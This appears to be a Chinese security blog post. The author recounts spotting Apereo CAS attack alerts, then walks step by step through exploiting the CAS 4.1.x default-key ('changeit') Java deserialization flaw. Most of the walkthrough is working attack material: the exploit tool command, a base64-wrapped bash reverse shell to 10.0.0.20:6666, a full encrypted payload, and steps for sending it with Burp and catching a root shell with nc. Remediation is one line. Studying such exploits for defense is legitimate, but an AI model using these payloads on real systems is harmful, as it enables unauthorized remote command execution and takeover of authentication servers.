开源的东西 你可以碰,但不要转手付费,不然违反开源协议
会发律师函的哟
看了两天监控,眼睛都看出血丝了
大概二十几条告警,其中十多条都是apereo cas硬编码漏洞,我就很疑惑,内网咋还有攻击,都是针对同一个ip进行攻击,然后给了我十多个扫描器的ip,让我忽略。。。。。。。
我看了一遍 ip都对不上,反馈 了一波,发现不是正常业务行为 封ip。
漏洞简介:
Apereo CAS 是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令。
既然是java反序列化漏洞就不整那么多 直接反弹shell
环境准备:
登录web页面 好记住长啥样,万一遇到了第一眼就知道有这么个漏洞
漏洞产生的原因就是使用了默认的key “changeit” 和shiro反序列化一样 利用默认的key 进行序列化攻击 (个人理解)
public class EncryptedTranscoder implements Transcoder { private CipherBean cipherBean; private boolean compression = true; public EncryptedTranscoder() throws IOException { BufferedBlockCipherBean bufferedBlockCipherBean = new BufferedBlockCipherBean(); bufferedBlockCipherBean.setBlockCipherSpec(new BufferedBlockCipherSpec("AES", "CBC", "PKCS7")); bufferedBlockCipherBean.setKeyStore(this.createAndPrepareKeyStore()); bufferedBlockCipherBean.setKeyAlias("aes128"); bufferedBlockCipherBean.setKeyPassword("changeit"); bufferedBlockCipherBean.setNonce(new RBGNonce()); this.setCipherBean(bufferedBlockCipherBean);
如何利用漏洞?
使用ysoserial的CommonsCollections4生成加密后的Payload:
下载地址:https://github.com/vulhub/Apereo-CAS-Attack/releases
java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "执行的命令"
反弹shell
base64加密先 直接用burp的编码工具
bash -i >& /dev/tcp/10.0.0.20/6666 0>&1 YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMjAvNjY2NiAwPiYx
将加密后的数据放到这里面 再利用工具二次加密
bash -c {echo,base64加密数据}|{base64,-d}|{bash,-i}
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMjAvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}
使用ysoserial的CommonsCollections4生成加密后的Payload:
java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMjAvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}"
38453ae9-5540-4801-a047-a03700d1ef32_AAAAIgAAABAwPhywezWPWV%2B%2BHCUMGwKkAAAABmFlczEyOF8pMsTBSDpqcIqGMxkTKoN8KTaINZ2vFy6%2BzcQw8TlV1MlVcYd8pbm6mQ3n7r%2Baa1v53a0ErZ3ycTKpoZp6oSYijvl%2B23dF4QkyBll4neKNKicJ0RhlhatQV444MwrXIH%2Fg%2FkfuxFJGBvgfweWKG2Vo0NVhro%2Bat123fnhkuobYKQ%2FPHh1mzv3%2BNJCTvt%2B6nHPAzUOwcoW6%2BwdxiIdZdfpo3JJ3Ksgi4eXnYxydPFeJT%2Bj5dQIShJstIpkCPSjoxjjttjIkC631IGkYKs5Bk5gfTuHzkNtqz4MmbnsDVdhvCk2nDG6Cv2MWMhXCDSZQsu2mN3YI6HHE7PBUhI7hi1%2B531eVdhjFradIoFwP7pxdEOnH7mQW4XaF95aiENgw%2BR7yRm5unaqEYVgc%2BHIheZxQnWbC8vC8gpUl%2BzAWbpnR3cWFu6oiJzTOkFnK632inBZSSDH0PbE4X1lH8CUHHMpWPTcmnMb97rr8PSX5BGzS5rSUfdRgat8Mjk%2Fy6zOgzXNJjI7qKBPyGeZutUa5GA6cMaDmBZERQcyEMcVWjjJi8dbEzi9qc7GaPM4aHMEeqjf7Hzr85D19u465A8MtgaDGqanQI5ooo9wPRlTafTacdtsgrp2la55Mu7mNnxcFGRAmKkgZmidjumtZpJty7EEYN4%2Fqktd8zzyxE2aaR%2FPnmw9Vwt7zX%2B71Oj3eScyJusZNTUSJbC4egERunGqm0KBkfQh%2BYncfzn6NG1TNtBmYw7W%2FwD3CS3hRjckGms8W5XzQFd4iBCbLuPV7ekLkvsKWlfm4IQ5jud5c7HrPM4YKVvnsasLKxOVEk0ZXNq5Bo50vlUl%2F7YqAwRVZXhp4eXnP8UwUrC%2BDX1UTVgZ2NENy7yqKAP3bPeMj8Cwn6oKr5E4st0HKCHIMHSJsaKuJL6VOlkfEVtT3TYSm4pVo%2FginwfpXZZDK5z2lnUf7ffRhPQP9B2D9bBdUpFKCE6xYuXkRJKZcGGsAsWStQN7Dt72wd2wuOQOQ4ea6JS%2BstX372q%2FZ5sA5ao%2F0FfSYlR0kEBhcoZX2JcCTwQ8s4iLZYWenGS6KBvRcfZZCkt35Dz1sTxyZrE6s%2FbI065KO0zVnzM9BM4xLXucyIWMgrfmM1KFMGlYcCnsTSDqG%2Fnn6K6PgPglAqER58Zj3tk%2BF33LTOgTNOOjTDkib30cGHnMBmTkBTFHPzdlXQ8V5E%2FTiJ2s%2Fw8DV9BDz2TIhyPxkc0m4bS9gvNJ0aDiUUmBjngJ7KEXz4b6%2FvAurO%2F6AkRwVyZrftqhYbMkgWoFc03uQ6uZL4%2FmEjoEqbtVE%2B3XA3cm2xFURbuKUJ8C5oKnkCbFoZXDE2eXKud%2F2wDozfbhajzIWJHodGYHH9RtcOzgQeaqrmGOne9gOrXzx3v%2FQ15gVdevZpebkDzuWGRfjF9aTm3UlZY0%2FKLwce18k50YR1HvxWjif56n1LrWAAostRNaAQRpsGhLyk%2BLT0XWJKNuPHTOAd5BNudHtGmMpNE4Fw7aeF6RNl9F1F7UBBaVD%2BEhUC46%2FllXk8%2FIdlLVr2usSN0IFSwTl%2Bs3iFvvmEyx%2B0oUKbVBNqbLrtDyogmHMjDetfZBb%2FxVSDApNghUhzhZ4kBBgVnl9rcn3QzpBWVjQQKk7kesCAuwJdaqPE%2FHfKFHY6kA9N3vQDCGUJYsQcwSUN2cGmwSj7ATWZv1IXKSGevXozISBQI3j%2BYBtM7ayF6z5VrCaPhv3BJ0UsT8a%2BhpKs2qqHzfRioBqm817ZI42w2IXzPUstO%2BCO5DBjTYh1yCvXlt4eYOcG5i0jKy%2FHBdRZ1ligPYv9z99zpYQyrBjiNXfY1gla5XsVnHcTA8mhgkv%2FQ4Di356aBqZqf1z4dFyFwlDVCs0Vt3WvcOdMrVpyP%2FLODrl5kzMTG4FfVFmAcsf67%2Bn%2BPcL8u%2FgALRiC%2BHjtot7S4TEUMWpVN9aWUSQeAsfRrBfPJiUO53v9%2F1KKcjz%2FII2jb1ZaWU7G%2B7LCc9ekbLVO%2BvUkqPhG5AsmVL7f56x7CmHCKUmICKOCi9hsCbAZKDJf3U%2BB5HyopMFJHPfNk4lppg%3D
登录处 抓包 更改数据
改好后 发给重发器
还有一步 也是关键的一步
开启nc监听,不然哪来的反弹shell
更改获取shell ,还是root权限,免去了提权的步骤。
漏洞修复:
打补丁,升级最新版
